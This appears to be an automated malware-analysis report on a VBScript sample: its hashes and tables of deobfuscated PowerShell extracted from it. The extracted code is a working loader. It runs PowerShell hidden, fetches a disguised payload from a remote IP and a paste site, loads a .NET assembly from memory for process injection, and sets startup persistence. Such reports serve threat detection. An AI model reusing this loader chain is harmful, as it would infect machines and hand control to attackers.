| Hash | Hash Value |
|---|---|
| MD5 | d004101a2a747c086835148e400462f7 |
| Sha1 | a7f445c5b9ecf11234474e74b623351d052f8596 |
| Sha256 | 5728fe1fbdd76d4b0ddb5e3cacb1aab8ccdaa03e6b53d497255eb24926f0ea67 |
| Sha384 | 2a5156b18b58a235ea15600b773badfaa14f0fbb01859cbf04b379fd8df0c814657db2e4d0e51b814697c9f6dedab6d0 |
| Sha512 | 3a26baaa449b6938abcc0648abfd079b6f5b24cedbd1ae35d52fb03bb6e45b497779726a6a400b2c288889a5576d90201500ea0a42cf946c0352cf09e895084c |
| SSDeep | 384:duMBjmqhD09v1TBkg44BS9kWIkeLdIoenFm9H4XLSnRHvtCFinZeC7T9r7n:o6aqhD09v1TBR/AYLvDH+LhwZeC7T5n |
| TLSH | C0C2C767FF0963788B02674A9E0D12299D6412A31A339978FF3DC56F0F2743597B4E88 |

| Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |

| Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html | d004101a2a747c086835148e400462f7 |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Invoke-Expression" Malicious | d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) Malicious | d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } )) Malicious | d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9PVFkQjFtWVIxVVpyOVNac2xtWnZrR2NoOVNidk5tTHVsV1l5UkdibGhYYXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression" Malicious | d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |